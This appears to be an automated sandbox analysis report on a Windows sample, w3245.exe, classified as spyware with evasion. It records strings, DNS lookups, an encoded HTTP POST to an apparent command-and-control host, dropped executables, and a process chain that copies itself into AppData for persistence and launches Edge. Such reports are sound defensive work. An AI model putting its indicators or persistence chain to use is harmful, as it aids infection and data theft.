Source: RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: B}lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1777743809.000000006CD59000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
Source: global traffic | DNS traffic detected: DNS query: c.msn.com
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown | DoH DNS queries detected: name: assets.msn.com
Source: unknown | DoH DNS queries detected: name: assets.msn.com
Source: unknown | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  Content-Length: 147
  Host: bamarelakij.site
Source: w3245.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: w3245.exe, 00000000.00000000.1658861478.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000000.1665459198.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://b.chenall.net/menu.lst
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://bug.reneelab.com
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1777743809.000000006CD59000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://bugreports.qt-project.org/
Source: RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1777743809.000000006CD59000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB43C8C _CreateDesktop_@24,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strcpy,strcpy,CreateDesktopA,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,GlobalFree
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3EEEA _CreateProcessAsUser_@44,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,memset,newMultiByteFromWideChar,CreateProcessAsUserA,GlobalFree,GlobalFree,GlobalFree,GlobalFree
Source: C:\Users\user\Desktop\w3245.exe | File deleted: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\w3245.exe | Code function: String function: 00800726 appears 34 times
Source: C:\Users\user\Desktop\w3245.exe | Code function: String function: 007C1F13 appears 54 times
Source: C:\Users\user\Desktop\w3245.exe | Code function: String function: 007C3821 appears 500 times
Source: C:\Users\user\Desktop\w3245.exe | Code function: String function: 00800237 appears 684 times
Source: C:\Users\user\Desktop\w3245.exe | Code function: String function: 008032F3 appears 85 times
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: String function: 6BD80C80 appears 46 times
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: String function: 6BD8B046 appears 50 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: String function: 00A40726 appears 34 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: String function: 00A432F3 appears 83 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: String function: 00A01F13 appears 54 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: String function: 00A03821 appears 501 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: String function: 00A40237 appears 683 times
Source: LocalCtrl_alpha_v3.exe.4.dr | Static PE information: Resource name: ZIP type: Zip archive data (empty)
Source: lshbkgxootar.12.dr | Static PE information: Number of sections : 12 > 10
Source: xbsvw.4.dr | Static PE information: Number of sections : 12 > 10
Source: w3245.exe, 00000000.00000000.1658898497.000000000082D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exe, 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exe, 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilenameSQLUNIRL.DLLJ vs w3245.exe
Source: w3245.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engine | Classification label: mal80.spyw.evad.winEXE@72/347@23/13
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007FFE21 FormatMessageW,GetLastError,LocalFree
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007C45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A045EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB42A14 _CreateService_@52,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CreateServiceA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_0080304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB37CC0 _FindResource@12,FindResourceW,newMultiByteFromWideChar,newMultiByteFromWideChar,FindResourceA,GlobalFree,GlobalFree
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007E6B88 ChangeServiceConfigW,GetLastError
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB439D2 _StartServiceCtrlDispatcher_@4,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,StartServiceCtrlDispatcherA,MultiByteToWideChar,GlobalFree,GlobalFree
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Users\user\Desktop\w3245.exe | File created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: cabinet.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: msi.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: version.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: wininet.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: comres.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: clbcatq.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: msasn1.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: crypt32.dll (0_2_007C1070)
Source: C:\Users\user\Desktop\w3245.exe | Command line argument: feclient.dll (0_2_007C1070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: cabinet.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: msi.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: version.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: wininet.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: comres.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: clbcatq.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: msasn1.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: crypt32.dll (1_2_00A01070)
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Command line argument: feclient.dll (1_2_00A01070)
Source: w3245.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\cmd.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\w3245.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: w3245.exe | String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\w3245.exe | File read: C:\Users\user\Desktop\w3245.exe
Source: unknown | Process created: C:\Users\user\Desktop\w3245.exe "C:\Users\user\Desktop\w3245.exe"
Source: C:\Users\user\Desktop\w3245.exe | Process created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Process created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
